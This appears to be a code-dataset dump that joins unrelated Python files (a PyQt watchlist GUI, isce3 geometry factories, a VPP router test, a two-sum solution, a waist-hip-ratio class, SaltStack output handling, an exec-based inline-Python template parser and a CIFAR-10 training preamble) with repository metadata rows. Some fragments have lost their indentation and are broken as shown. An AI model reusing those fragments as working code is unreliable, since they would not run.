MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtGui.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 800, 25))
self.menubar.setObjectName(_fromUtf8("menubar"))
self.menuFile = QtGui.QMenu(self.menubar)
self.menuFile.setObjectName(_fromUtf8("menuFile"))
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtGui.QStatusBar(MainWindow)
self.statusbar.setObjectName(_fromUtf8("statusbar"))
MainWindow.setStatusBar(self.statusbar)
self.actionOpen = QtGui.QAction(MainWindow)
self.actionOpen.setObjectName(_fromUtf8("actionOpen"))
self.actionSave = QtGui.QAction(MainWindow)
self.actionSave.setObjectName(_fromUtf8("actionSave"))
self.actionQuit = QtGui.QAction(MainWindow)
self.actionQuit.setObjectName(_fromUtf8("actionQuit"))
self.menuFile.addAction(self.actionOpen)
self.menuFile.addAction(self.actionSave)
self.menuFile.addAction(self.actionQuit)
self.menubar.addAction(self.menuFile.menuAction())
# The following is our hand-typed code within the designer generated constructor method
# When the Quit action from menu bar is clicked or the shortcut is entered,
# close the watchlist window
        self.actionQuit.triggered.connect(MainWindow.close)
        # When the Open action from menu bar is clicked or the shortcut is entered,
        # get the path of the watchlist file via a QFileDialog
        self.actionOpen.triggered.connect(self.openWatchlist)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
MainWindow.setWindowTitle(_translate("MainWindow", "Movie Information - Watchlist", None))
self.pushButton.setText(_translate("MainWindow", "More Details: 1", None))
self.pushButton_2.setText(_translate("MainWindow", "More Details: 2", None))
self.pushButton_3.setText(_translate("MainWindow", "More Details: 3", None))
self.pushButton_4.setText(_translate("MainWindow", "More Details: 4", None))
self.pushButton_5.setText(_translate("MainWindow", "More Details: 5", None))
self.pushButton_6.setText(_translate("MainWindow", "More Details: 6", None))
self.label.setText(_translate("MainWindow", "1: Captain America: Civil War (2016)", None))
self.label_2.setText(_translate("MainWindow", "2: Good Will Hunting (1997)", None))
self.label_3.setText(_translate("MainWindow", "3: Black Hawk Down (2001)", None))
self.label_4.setText(_translate("MainWindow", "4: Jimmy Neutron Boy Genius (2001)", None))
self.label_5.setText(_translate("MainWindow", "5: Despicable Me (2010)", None))
self.label_6.setText(_translate("MainWindow", "6: Watchmen (2009)", None))
self.menuFile.setTitle(_translate("MainWindow", "File", None))
self.actionOpen.setText(_translate("MainWindow", "Open", None))
self.actionOpen.setShortcut(_translate("MainWindow", "Ctrl+O", None))
self.actionSave.setText(_translate("MainWindow", "Save", None))
self.actionSave.setShortcut(_translate("MainWindow", "Ctrl+S", None))
self.actionQuit.setText(_translate("MainWindow", "Quit", None))
self.actionQuit.setShortcut(_translate("MainWindow", "Ctrl+Q", None))
def openWatchlist(self):
wlPath = QtGui.QFileDialog.getOpenFileName(MainWindow,
'Open watchlist file', 'c:\\', 'Watchlist files (*.wl)')
print wlPath, "\n"
with open(wlPath, "r") as wlFile:
print wlFile.read()
# This code in the scope of this 'if statement' runs if the code is executed directly, as opposed to being imported
# in another Python script. This is where the execution of the program code begins.
if __name__ == "__main__":
# The 'sys' module is imported to allow the program's execution to be halted once the user has
# closed the application.
import sys
# The application object is defined. 'sys.argv' represents a list of parameters provided by the user
# when executing the program from the terminal / command prompt. Our program doesn't make use of any, but it is
# convention in PyQt programming to accept them.
app = QtGui.QApplication(sys.argv)
    # A generic window object is instantiated to be used as a parameter of the 'setupUi' method of
    # the 'Ui_MainWindow' class.
icon = QtGui.QIcon()
icon.addFile('images/SELogoSmall.png', QtCore.QSize(256, 256))
app.setWindowIcon(icon)
MainWindow = QtGui.QMainWindow()
    # The main / home window of the application is instantiated as 'ui', and its setup method is called
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
# The main window is displayed to the user.
MainWindow.show()
    # When the execution of the application has been ended by the user, the script's execution stops.
sys.exit(app.exec_())
| 56.4
| 115
| 0.726314
|
913cae46ed5e7916338153c8a0bf517efd4902e3
| 684
|
py
|
Python
|
python/packages/isce3/geometry/__init__.py
|
piyushrpt/isce3
|
1741af321470cb5939693459765d11a19c5c6fc2
|
[
"Apache-2.0"
] | null | null | null |
python/packages/isce3/geometry/__init__.py
|
piyushrpt/isce3
|
1741af321470cb5939693459765d11a19c5c6fc2
|
[
"Apache-2.0"
] | null | null | null |
python/packages/isce3/geometry/__init__.py
|
piyushrpt/isce3
|
1741af321470cb5939693459765d11a19c5c6fc2
|
[
"Apache-2.0"
] | null | null | null |
#-*- coding: utf-8 -*-
# Import the wrappers
from .Rdr2geo import rdr2geo_point, rdr2geo_cone
from .Geo2rdr import geo2rdr_point
from .geometry import getGeoPerimeter
def rdr2geo(**kwds):
"""A factory for Rdr2geo"""
from .Rdr2geo import Rdr2geo
return Rdr2geo(**kwds)
def geo2rdr(**kwds):
"""A factory for Geo2rdr"""
from .Geo2rdr import Geo2rdr
return Geo2rdr(**kwds)
def geocode(**kwds):
"""A factory for Geocode"""
from .Geocode import Geocode
return Geocode(**kwds)
def deminterpolator(**kwds):
"""A factory for DEMInterpolator"""
from .DEMInterpolator import DEMInterpolator
return DEMInterpolator(**kwds)
# end of file
| 20.117647
| 48
| 0.69152
|
07ea7878a74b9bccd1d09edd3d3e5cb0891f24c6
| 14,938
|
py
|
Python
|
test/test_dvr.py
|
mjnitp/vpp
|
537e85deab6fd916952ff4badeda4ec5d6f1a121
|
[
"Apache-2.0"
] | 1
|
2019-03-23T21:06:14.000Z
|
2019-03-23T21:06:14.000Z
|
test/test_dvr.py
|
fantastic2085/vpp
|
c599c6f001bc28e1023fb5e74a27db37b1aae847
|
[
"Apache-2.0"
] | 1
|
2021-06-01T23:31:18.000Z
|
2021-06-01T23:31:18.000Z
|
test/test_dvr.py
|
fantastic2085/vpp
|
c599c6f001bc28e1023fb5e74a27db37b1aae847
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
import unittest
from framework import VppTestCase, VppTestRunner
from vpp_sub_interface import VppDot1QSubint
from vpp_ip_route import VppIpRoute, VppRoutePath
from vpp_papi_provider import L2_VTR_OP, L2_PORT_TYPE
from scapy.packet import Raw
from scapy.layers.l2 import Ether, Dot1Q
from scapy.layers.inet import IP, UDP
from socket import AF_INET, inet_pton
class TestDVR(VppTestCase):
""" Distributed Virtual Router """
def setUp(self):
super(TestDVR, self).setUp()
self.create_pg_interfaces(range(4))
self.create_loopback_interfaces(1)
for i in self.pg_interfaces:
i.admin_up()
self.loop0.config_ip4()
def tearDown(self):
for i in self.pg_interfaces:
i.admin_down()
self.loop0.unconfig_ip4()
super(TestDVR, self).tearDown()
def assert_same_mac_addr(self, tx, rx):
t_eth = tx[Ether]
for p in rx:
r_eth = p[Ether]
self.assertEqual(t_eth.src, r_eth.src)
self.assertEqual(t_eth.dst, r_eth.dst)
def assert_has_vlan_tag(self, tag, rx):
for p in rx:
r_1q = p[Dot1Q]
self.assertEqual(tag, r_1q.vlan)
def assert_has_no_tag(self, rx):
for p in rx:
self.assertFalse(p.haslayer(Dot1Q))
def test_dvr(self):
""" Distributed Virtual Router """
#
# A packet destined to an IP address that is L2 bridged via
# a non-tag interface
#
ip_non_tag_bridged = "10.10.10.10"
ip_tag_bridged = "10.10.10.11"
any_src_addr = "1.1.1.1"
pkt_no_tag = (Ether(src=self.pg0.remote_mac,
dst=self.loop0.local_mac) /
IP(src=any_src_addr,
dst=ip_non_tag_bridged) /
UDP(sport=1234, dport=1234) /
Raw('\xa5' * 100))
pkt_tag = (Ether(src=self.pg0.remote_mac,
dst=self.loop0.local_mac) /
IP(src=any_src_addr,
dst=ip_tag_bridged) /
UDP(sport=1234, dport=1234) /
Raw('\xa5' * 100))
#
# Two sub-interfaces so we can test VLAN tag push/pop
#
sub_if_on_pg2 = VppDot1QSubint(self, self.pg2, 92)
sub_if_on_pg3 = VppDot1QSubint(self, self.pg3, 93)
sub_if_on_pg2.admin_up()
sub_if_on_pg3.admin_up()
#
# Put all the interfaces into a new bridge domain
#
self.vapi.sw_interface_set_l2_bridge(
rx_sw_if_index=self.pg0.sw_if_index, bd_id=1)
self.vapi.sw_interface_set_l2_bridge(
rx_sw_if_index=self.pg1.sw_if_index, bd_id=1)
self.vapi.sw_interface_set_l2_bridge(
rx_sw_if_index=sub_if_on_pg2.sw_if_index, bd_id=1)
self.vapi.sw_interface_set_l2_bridge(
rx_sw_if_index=sub_if_on_pg3.sw_if_index, bd_id=1)
self.vapi.sw_interface_set_l2_bridge(
rx_sw_if_index=self.loop0.sw_if_index, bd_id=1,
port_type=L2_PORT_TYPE.BVI)
self.vapi.l2_interface_vlan_tag_rewrite(
sw_if_index=sub_if_on_pg2.sw_if_index, vtr_op=L2_VTR_OP.L2_POP_1,
push_dot1q=92)
self.vapi.l2_interface_vlan_tag_rewrite(
sw_if_index=sub_if_on_pg3.sw_if_index, vtr_op=L2_VTR_OP.L2_POP_1,
push_dot1q=93)
#
        # Add a route to bridge the traffic via the non-tagged interface
#
route_no_tag = VppIpRoute(
self, ip_non_tag_bridged, 32,
[VppRoutePath("0.0.0.0",
self.pg1.sw_if_index,
is_dvr=1)])
route_no_tag.add_vpp_config()
#
# Inject the packet that arrives and leaves on a non-tagged interface
        # Since it's 'bridged' expect that the MAC header is unchanged.
#
rx = self.send_and_expect(self.pg0, pkt_no_tag * 65, self.pg1)
self.assert_same_mac_addr(pkt_no_tag, rx)
self.assert_has_no_tag(rx)
#
# Add routes to bridge the traffic via a tagged interface
#
route_with_tag = VppIpRoute(
self, ip_tag_bridged, 32,
[VppRoutePath("0.0.0.0",
sub_if_on_pg3.sw_if_index,
is_dvr=1)])
route_with_tag.add_vpp_config()
#
# Inject the packet that arrives non-tag and leaves on a tagged
# interface
#
rx = self.send_and_expect(self.pg0, pkt_tag * 65, self.pg3)
self.assert_same_mac_addr(pkt_tag, rx)
self.assert_has_vlan_tag(93, rx)
#
# Tag to tag
#
pkt_tag_to_tag = (Ether(src=self.pg2.remote_mac,
dst=self.loop0.local_mac) /
Dot1Q(vlan=92) /
IP(src=any_src_addr,
dst=ip_tag_bridged) /
UDP(sport=1234, dport=1234) /
Raw('\xa5' * 100))
rx = self.send_and_expect(self.pg2, pkt_tag_to_tag * 65, self.pg3)
self.assert_same_mac_addr(pkt_tag_to_tag, rx)
self.assert_has_vlan_tag(93, rx)
#
# Tag to non-Tag
#
pkt_tag_to_non_tag = (Ether(src=self.pg2.remote_mac,
dst=self.loop0.local_mac) /
Dot1Q(vlan=92) /
IP(src=any_src_addr,
dst=ip_non_tag_bridged) /
UDP(sport=1234, dport=1234) /
Raw('\xa5' * 100))
rx = self.send_and_expect(self.pg2, pkt_tag_to_non_tag * 65, self.pg1)
        self.assert_same_mac_addr(pkt_tag_to_non_tag, rx)
self.assert_has_no_tag(rx)
#
# Add an output L3 ACL that will block the traffic
#
rule_1 = ({'is_permit': 0,
'is_ipv6': 0,
'proto': 17,
'srcport_or_icmptype_first': 1234,
'srcport_or_icmptype_last': 1234,
'src_ip_prefix_len': 32,
'src_ip_addr': inet_pton(AF_INET, any_src_addr),
'dstport_or_icmpcode_first': 1234,
'dstport_or_icmpcode_last': 1234,
'dst_ip_prefix_len': 32,
'dst_ip_addr': inet_pton(AF_INET, ip_non_tag_bridged)})
acl = self.vapi.acl_add_replace(acl_index=4294967295,
r=[rule_1])
#
# Apply the ACL on the output interface
#
self.vapi.acl_interface_set_acl_list(self.pg1.sw_if_index,
0,
[acl.acl_index])
#
        # Send packets that should match the ACL and be dropped
#
rx = self.send_and_assert_no_replies(self.pg2, pkt_tag_to_non_tag * 65)
#
# cleanup
#
self.vapi.acl_interface_set_acl_list(self.pg1.sw_if_index,
0, [])
self.vapi.acl_del(acl.acl_index)
self.vapi.sw_interface_set_l2_bridge(
rx_sw_if_index=self.pg0.sw_if_index, bd_id=1, enable=0)
self.vapi.sw_interface_set_l2_bridge(
rx_sw_if_index=self.pg1.sw_if_index, bd_id=1, enable=0)
self.vapi.sw_interface_set_l2_bridge(
rx_sw_if_index=sub_if_on_pg2.sw_if_index, bd_id=1, enable=0)
self.vapi.sw_interface_set_l2_bridge(
rx_sw_if_index=sub_if_on_pg3.sw_if_index, bd_id=1, enable=0)
self.vapi.sw_interface_set_l2_bridge(
rx_sw_if_index=self.loop0.sw_if_index, bd_id=1,
port_type=L2_PORT_TYPE.BVI, enable=0)
#
# Do a FIB dump to make sure the paths are correctly reported as DVR
#
routes = self.vapi.ip_fib_dump()
for r in routes:
if (inet_pton(AF_INET, ip_tag_bridged) == r.address):
self.assertEqual(r.path[0].sw_if_index,
sub_if_on_pg3.sw_if_index)
self.assertEqual(r.path[0].is_dvr, 1)
if (inet_pton(AF_INET, ip_non_tag_bridged) == r.address):
self.assertEqual(r.path[0].sw_if_index,
self.pg1.sw_if_index)
self.assertEqual(r.path[0].is_dvr, 1)
#
        # the explicit route delete is required so that it happens before the
        # sub-interface delete. The sub-interface delete is required because that
        # object type does not use the object registry
#
route_no_tag.remove_vpp_config()
route_with_tag.remove_vpp_config()
sub_if_on_pg3.remove_vpp_config()
sub_if_on_pg2.remove_vpp_config()
def test_l2_emulation(self):
""" L2 Emulation """
#
# non distinct L3 packets, in the tag/non-tag combos
#
pkt_no_tag = (Ether(src=self.pg0.remote_mac,
dst=self.pg1.remote_mac) /
IP(src="2.2.2.2",
dst="1.1.1.1") /
UDP(sport=1234, dport=1234) /
Raw('\xa5' * 100))
pkt_to_tag = (Ether(src=self.pg0.remote_mac,
dst=self.pg2.remote_mac) /
IP(src="2.2.2.2",
dst="1.1.1.2") /
UDP(sport=1234, dport=1234) /
Raw('\xa5' * 100))
pkt_from_tag = (Ether(src=self.pg3.remote_mac,
dst=self.pg2.remote_mac) /
Dot1Q(vlan=93) /
IP(src="2.2.2.2",
dst="1.1.1.1") /
UDP(sport=1234, dport=1234) /
Raw('\xa5' * 100))
pkt_from_to_tag = (Ether(src=self.pg3.remote_mac,
dst=self.pg2.remote_mac) /
Dot1Q(vlan=93) /
IP(src="2.2.2.2",
dst="1.1.1.2") /
UDP(sport=1234, dport=1234) /
Raw('\xa5' * 100))
pkt_bcast = (Ether(src=self.pg0.remote_mac,
dst="ff:ff:ff:ff:ff:ff") /
IP(src="2.2.2.2",
dst="255.255.255.255") /
UDP(sport=1234, dport=1234) /
Raw('\xa5' * 100))
#
# A couple of sub-interfaces for tags
#
sub_if_on_pg2 = VppDot1QSubint(self, self.pg2, 92)
sub_if_on_pg3 = VppDot1QSubint(self, self.pg3, 93)
sub_if_on_pg2.admin_up()
sub_if_on_pg3.admin_up()
#
# Put all the interfaces into a new bridge domain
#
self.vapi.sw_interface_set_l2_bridge(
rx_sw_if_index=self.pg0.sw_if_index, bd_id=1)
self.vapi.sw_interface_set_l2_bridge(
rx_sw_if_index=self.pg1.sw_if_index, bd_id=1)
self.vapi.sw_interface_set_l2_bridge(
rx_sw_if_index=sub_if_on_pg2.sw_if_index, bd_id=1)
self.vapi.sw_interface_set_l2_bridge(
rx_sw_if_index=sub_if_on_pg3.sw_if_index, bd_id=1)
self.vapi.l2_interface_vlan_tag_rewrite(
sw_if_index=sub_if_on_pg2.sw_if_index, vtr_op=L2_VTR_OP.L2_POP_1,
push_dot1q=92)
self.vapi.l2_interface_vlan_tag_rewrite(
sw_if_index=sub_if_on_pg3.sw_if_index, vtr_op=L2_VTR_OP.L2_POP_1,
push_dot1q=93)
#
        # Disable UU flooding, learning and ARP termination; this makes the test
        # easier as unicast packets are dropped if not extracted.
#
self.vapi.bridge_flags(bd_id=1, is_set=0,
flags=(1 << 0) | (1 << 3) | (1 << 4))
#
# Add a DVR route to steer traffic at L3
#
route_1 = VppIpRoute(self, "1.1.1.1", 32,
[VppRoutePath("0.0.0.0",
self.pg1.sw_if_index,
is_dvr=1)])
route_2 = VppIpRoute(self, "1.1.1.2", 32,
[VppRoutePath("0.0.0.0",
sub_if_on_pg2.sw_if_index,
is_dvr=1)])
route_1.add_vpp_config()
route_2.add_vpp_config()
#
# packets are dropped because bridge does not flood unknown unicast
#
self.send_and_assert_no_replies(self.pg0, pkt_no_tag)
#
# Enable L3 extraction on pgs
#
self.vapi.l2_emulation(self.pg0.sw_if_index)
self.vapi.l2_emulation(self.pg1.sw_if_index)
self.vapi.l2_emulation(sub_if_on_pg2.sw_if_index)
self.vapi.l2_emulation(sub_if_on_pg3.sw_if_index)
#
# now we expect the packet forward according to the DVR route
#
rx = self.send_and_expect(self.pg0, pkt_no_tag * 65, self.pg1)
self.assert_same_mac_addr(pkt_no_tag, rx)
self.assert_has_no_tag(rx)
rx = self.send_and_expect(self.pg0, pkt_to_tag * 65, self.pg2)
self.assert_same_mac_addr(pkt_to_tag, rx)
self.assert_has_vlan_tag(92, rx)
rx = self.send_and_expect(self.pg3, pkt_from_tag * 65, self.pg1)
self.assert_same_mac_addr(pkt_from_tag, rx)
self.assert_has_no_tag(rx)
rx = self.send_and_expect(self.pg3, pkt_from_to_tag * 65, self.pg2)
        self.assert_same_mac_addr(pkt_from_to_tag, rx)
self.assert_has_vlan_tag(92, rx)
#
# but broadcast packets are still flooded
#
self.send_and_expect(self.pg0, pkt_bcast * 33, self.pg2)
#
# cleanup
#
self.vapi.l2_emulation(self.pg0.sw_if_index,
enable=0)
self.vapi.l2_emulation(self.pg1.sw_if_index,
enable=0)
self.vapi.l2_emulation(sub_if_on_pg2.sw_if_index,
enable=0)
self.vapi.l2_emulation(sub_if_on_pg3.sw_if_index,
enable=0)
self.vapi.sw_interface_set_l2_bridge(
rx_sw_if_index=self.pg0.sw_if_index, bd_id=1, enable=0)
self.vapi.sw_interface_set_l2_bridge(
rx_sw_if_index=self.pg1.sw_if_index, bd_id=1, enable=0)
self.vapi.sw_interface_set_l2_bridge(
rx_sw_if_index=sub_if_on_pg2.sw_if_index, bd_id=1, enable=0)
self.vapi.sw_interface_set_l2_bridge(
rx_sw_if_index=sub_if_on_pg3.sw_if_index, bd_id=1, enable=0)
route_1.remove_vpp_config()
route_2.remove_vpp_config()
sub_if_on_pg3.remove_vpp_config()
sub_if_on_pg2.remove_vpp_config()
if __name__ == '__main__':
unittest.main(testRunner=VppTestRunner)
| 37.627204
| 79
| 0.551212
|
6b5eda1b79ebe96d1e9d6bad366cb434fb0157ea
| 362
|
py
|
Python
|
Dataset/Leetcode/train/1/647.py
|
kkcookies99/UAST
|
fff81885aa07901786141a71e5600a08d7cb4868
|
[
"MIT"
] | null | null | null |
Dataset/Leetcode/train/1/647.py
|
kkcookies99/UAST
|
fff81885aa07901786141a71e5600a08d7cb4868
|
[
"MIT"
] | null | null | null |
Dataset/Leetcode/train/1/647.py
|
kkcookies99/UAST
|
fff81885aa07901786141a71e5600a08d7cb4868
|
[
"MIT"
] | null | null | null |
from typing import List


class Solution:
def XXX(self, nums: List[int], target: int) -> List[int]:
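        # Two Sum: walk the list once, remembering each value's index; when the current
        # element's complement (target - nums[i]) has already been seen, return both indices.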
nums_dict = {}
ret = []
for i in range(len(nums)):
if target - nums[i] not in nums_dict:
nums_dict[nums[i]] = i
else:
ret = [nums_dict.get(target - nums[i]), i]
break
return ret
| 27.846154
| 61
| 0.461326
|
ae5ed281f4884746a98c97766861b2a5dad3ffc4
| 1,366
|
py
|
Python
|
OHA/assessments/WHRAssessment.py
|
openhealthalgorithms/algorithms
|
97ce727079ea18607a4144ff1d053a208bbc6c6e
|
[
"Apache-2.0"
] | 2
|
2017-01-08T11:00:04.000Z
|
2017-01-21T17:38:11.000Z
|
OHA/assessments/WHRAssessment.py
|
fredhersch/openhealthalgorithms
|
97ce727079ea18607a4144ff1d053a208bbc6c6e
|
[
"Apache-2.0"
] | 9
|
2017-08-20T13:59:28.000Z
|
2018-01-20T11:20:12.000Z
|
OHA/assessments/WHRAssessment.py
|
openhealthalgorithms/algorithms
|
97ce727079ea18607a4144ff1d053a208bbc6c6e
|
[
"Apache-2.0"
] | 1
|
2017-01-22T09:53:31.000Z
|
2017-01-22T09:53:31.000Z
|
from OHA.assessments.BaseAssessment import BaseAssessment
from OHA.helpers.converters.HipConverter import HipConverter
from OHA.helpers.converters.WaistConverter import WaistConverter
__author__ = 'indrajit'
__email__ = 'eendroroy@gmail.com'
class WHRAssessment(BaseAssessment):
def __init__(self, input_data=None):
if input_data is not None:
if input_data['gender'] not in ['F', 'M']:
raise ValueError('gender value must be "F" or "M"')
super(WHRAssessment, self).__init__(input_data)
@property
def __waist(self):
waist = self._get_data()['waist']
return WaistConverter(waist[0]).from_unit(waist[1]).converted
@property
def __hip(self):
hip = self._get_data()['hip']
return HipConverter(hip[0]).from_unit(hip[1]).converted
@property
def __gender(self):
return self._get_data()['gender']
@property
def __whr(self):
return round(float(self.__waist / self.__hip), 2)
def assess(self):
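        # The waist-hip ratio is compared against the gender-specific target
        # (0.85 for 'F', 0.9 for 'M'); ratios at or above the target get a non-zero result code.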
result_code = 'WHR-0'
target = 0.85 if self.__gender == 'F' else 0.9
whr = self.__whr
if self.__gender == 'F' and whr >= 0.85:
result_code = 'WHR-1'
elif self.__gender == 'M' and whr >= 0.9:
result_code = 'WHR-2'
return dict(value=whr, code=result_code, target=target)
| 30.355556
| 69
| 0.635432
|
647658c9b7aa65cc4c19d431088458c786d6da07
| 5,041
|
py
|
Python
|
salt/output/__init__.py
|
preoctopus/salt
|
aceaaa0e2f2f2ff29a694393bd82bba0d88fa44d
|
[
"Apache-2.0"
] | 3
|
2015-04-16T18:42:35.000Z
|
2017-10-30T16:57:49.000Z
|
salt/output/__init__.py
|
preoctopus/salt
|
aceaaa0e2f2f2ff29a694393bd82bba0d88fa44d
|
[
"Apache-2.0"
] | 16
|
2015-11-18T00:44:03.000Z
|
2018-10-29T20:48:27.000Z
|
salt/output/__init__.py
|
preoctopus/salt
|
aceaaa0e2f2f2ff29a694393bd82bba0d88fa44d
|
[
"Apache-2.0"
] | 1
|
2020-10-19T11:49:50.000Z
|
2020-10-19T11:49:50.000Z
|
# -*- coding: utf-8 -*-
'''
Used to manage the outputter system. This package is the modular system used
for managing outputters.
'''
# Import python libs
from __future__ import print_function
from __future__ import absolute_import
import os
import sys
import errno
import logging
import traceback
from salt.ext.six import string_types
# Import salt libs
import salt.loader
import salt.utils
from salt.utils import print_cli
import salt.ext.six as six
# Are you really sure !!!
# dealing with unicode is not as simple as setting defaultencoding
# which can break other python modules imported by salt in bad ways...
# reloading sys is not either a good idea...
# reload(sys)
# sys.setdefaultencoding('utf-8')
log = logging.getLogger(__name__)
def try_printout(data, out, opts):
'''
Safely get the string to print out, try the configured outputter, then
fall back to nested and then to raw
'''
try:
return get_printout(out, opts)(data).rstrip()
except (KeyError, AttributeError):
log.debug(traceback.format_exc())
try:
return get_printout('nested', opts)(data).rstrip()
except (KeyError, AttributeError):
log.error('Nested output failed: ', exc_info=True)
return get_printout('raw', opts)(data).rstrip()
def get_progress(opts, out, progress):
'''
Get the progress bar from the given outputter
'''
return salt.loader.raw_mod(opts,
out,
'rawmodule',
mod='output')['{0}.progress_iter'.format(out)](progress)
def update_progress(opts, progress, progress_iter, out):
'''
Update the progress iterator for the given outputter
'''
# Look up the outputter
try:
progress_outputter = salt.loader.outputters(opts)[out]
except KeyError: # Outputter is not loaded
log.warning('Progress outputter not available.')
return False
progress_outputter(progress, progress_iter)
def progress_end(progress_iter):
try:
progress_iter.stop()
except Exception:
pass
return None
def display_output(data, out=None, opts=None):
'''
Print the passed data using the desired output
'''
if opts is None:
opts = {}
display_data = try_printout(data, out, opts)
output_filename = opts.get('output_file', None)
log.trace('data = {0}'.format(data))
try:
# output filename can be either '' or None
if output_filename:
with salt.utils.fopen(output_filename, 'a') as ofh:
fdata = display_data
if isinstance(fdata, six.text_type):
try:
fdata = fdata.encode('utf-8')
except (UnicodeDecodeError, UnicodeEncodeError):
# try to let the stream write
# even if we didn't encode it
pass
ofh.write(fdata)
ofh.write('\n')
return
if display_data:
print_cli(display_data)
except IOError as exc:
# Only raise if it's NOT a broken pipe
if exc.errno != errno.EPIPE:
raise exc
def get_printout(out, opts=None, **kwargs):
'''
Return a printer function
'''
if opts is None:
opts = {}
if 'output' in opts:
# new --out option
out = opts['output']
if out == 'text':
out = 'txt'
elif out is None or out == '':
out = 'nested'
if opts.get('progress', False):
out = 'progress'
opts.update(kwargs)
if 'color' not in opts:
def is_pipe():
'''
Check if sys.stdout is a pipe or not
'''
try:
fileno = sys.stdout.fileno()
except AttributeError:
fileno = -1 # sys.stdout is StringIO or fake
return not os.isatty(fileno)
if opts.get('force_color', False):
opts['color'] = True
elif opts.get('no_color', False) or is_pipe() or salt.utils.is_windows():
opts['color'] = False
else:
opts['color'] = True
outputters = salt.loader.outputters(opts)
if out not in outputters:
# Since the grains outputter was removed we don't need to fire this
# error when old minions are asking for it
if out != 'grains':
log.error('Invalid outputter {0} specified, fall back to nested'.format(out))
return outputters['nested']
return outputters[out]
def out_format(data, out, opts=None):
'''
Return the formatted outputter string for the passed data
'''
return try_printout(data, out, opts)
def strip_esc_sequence(txt):
'''
Replace ESC (ASCII 27/Oct 33) to prevent unsafe strings
from writing their own terminal manipulation commands
'''
if isinstance(txt, six.string_types):
return txt.replace('\033', '?')
else:
return txt
| 28.642045
| 89
| 0.597104
|
53e5778d56f5af9fdcb29309be4063e3b9951ddb
| 3,609
|
py
|
Python
|
system/ilpy.py
|
melvin2204/Webserver
|
653be0c0a3fadbced422a8b57e5a07ad8acef207
|
[
"MIT"
] | 1
|
2018-05-05T00:03:03.000Z
|
2018-05-05T00:03:03.000Z
|
system/ilpy.py
|
melvin2204/Webserver
|
653be0c0a3fadbced422a8b57e5a07ad8acef207
|
[
"MIT"
] | 2
|
2018-05-04T23:52:49.000Z
|
2018-05-11T23:16:13.000Z
|
system/ilpy.py
|
melvin2204/Webserver
|
653be0c0a3fadbced422a8b57e5a07ad8acef207
|
[
"MIT"
] | null | null | null |
#inline python parser
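# Flow: run() reads the requested file line by line; work() collects the code found between
# "<?py" and "?>" tags and marks each block with a unique ID; runCode() executes the collected
# code, capturing anything passed to output() in a temp file; finally the captured text is
# spliced back into the page in place of the ID markers.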
import os
import time
import string
import random
StartTag = False #encountered a start tag
code = "" #received code
output = "" #final output
tempFileName = None #name for the temp file
idCode = None
idCodes = []
def work(line,arguments):
global StartTag,code,output,idCode
if line.lstrip()[:4] == "<?py": #if the line is a start tag
StartTag = True #found a start tag
addBreaker()
return #stop further execution
if line.lstrip()[:2] == "?>": #if the line is an end tag
#runCode(arguments) #execute the collected code
output = output + "ilpy" + idCode
StartTag = False #remove the start tag
return
    code = code + line  # if it isn't a start or end tag, append the line to the final code to run
def id(size=6, chars=string.ascii_letters + string.digits):
return ''.join(random.choice(chars) for _ in range(size))
def addBreaker():
global code,idCode
idCode = id(size=100)
idCodes.append(idCode)
injection = """\
ilpySegmentCode = '""" + idCode + """'
"""
code = code + injection
def runCode(arguments):
global code,output, tempFileName
tempFileName = int(round(time.time() * 1000)) #make a temp file name
injectionCode = """\
ilpyCurrentSegment = ""
def void(*args, **kwargs):
return
def output(text,*args, **kwargs):
global ilpyCurrentSegment,ilpySegmentCode
file = open('""" + str(tempFileName) + """.ilpytemp',"a")
if ilpyCurrentSegment != ilpySegmentCode and ilpyCurrentSegment != "":
file.write(ilpyCurrentSegment)
ilpyCurrentSegment = ""
if ilpyCurrentSegment == "":
ilpyCurrentSegment = ilpySegmentCode
if not ilpySegmentCode == "end":
file.write(str(text) + "\\n")
file.close()
input = void
#print = output
""" #code to inject to collect the output
code = injectionCode + code #add it to the code
try:
file = open(str(tempFileName) + ".ilpytemp","w+") #make a temp file
file.close()
exec(code,arguments) #run the code with the arguments from the server
except Exception as e:
file = open(str(tempFileName) + ".ilpytemp","a") #write any errors to the temp file
file.write(str(e) + "\n")
file.close()
finally:
file = open(str(tempFileName) + ".ilpytemp", "r") #read the temp file
result = file.read()
for id in idCodes:
codeOutput = result.split(id)[0]
output = output.replace("ilpy"+id,codeOutput)
result = result.replace(codeOutput + id,"")
file.close()
def run(runFile,arguments):
global StartTag,output,code,tempFileName
file = open(runFile, "r") #open the requested ilpy file
for line in file.readlines(): #read every line
if line.lstrip()[:4] == "<?py" or (line.lstrip()[:2] == "?>" and StartTag ) or StartTag: #if it is a start tag, end tag, or it already encountered a start tag
            work(line,arguments)  # analyse the line
else: #the line contains no code
output = output + line #write the line to the final output
file.close()
code = code + "\n\n\nilpySegmentCode = 'end'\noutput('')"
runCode(arguments)
outputTemp = output #store the output in a temp var
output = "" #clear all the variables
code = ""
StartTag = False
try:
os.remove(str(tempFileName) + ".ilpytemp") #remove the temp file
finally:
return outputTemp #return the final output
| 36.454545
| 168
| 0.613743
|
26ba0f3c4590bd4420a59977df7e33dcd8f652f1
| 18,149
|
py
|
Python
|
meps_train.py
|
ylsung/cifar10-fast
|
8dcf3841d3ecbf645642f4b78b6adc51d4920f9e
|
[
"MIT"
] | null | null | null |
meps_train.py
|
ylsung/cifar10-fast
|
8dcf3841d3ecbf645642f4b78b6adc51d4920f9e
|
[
"MIT"
] | null | null | null |
meps_train.py
|
ylsung/cifar10-fast
|
8dcf3841d3ecbf645642f4b78b6adc51d4920f9e
|
[
"MIT"
] | null | null | null |
import os
import argparse
import numpy as np
import torch
import torch.nn as nn
from collections import namedtuple, OrderedDict
import torchvision as tv
import torch.nn.functional as F
from torch.utils.data import DataLoader, Dataset, Subset
from torch import optim
from functools import partial
import copy
import math
import random
from randaugment import RandAugmentMC
from PIL import Image
from meps import meps_wrapper
from core import (
normalise,
transpose,
pad,
preprocess,
PiecewiseLinear,
map_nested,
Timer,
group_by_key,
Table,
union,
Crop,
FlipLR,
flip_lr
)
from torch_backend import (
cifar10,
cifar10_mean,
cifar10_std,
cifar10_classes,
cov,
patches,
eigens,
to,
trainable_params,
Flatten,
Mul,
GhostBatchNorm,
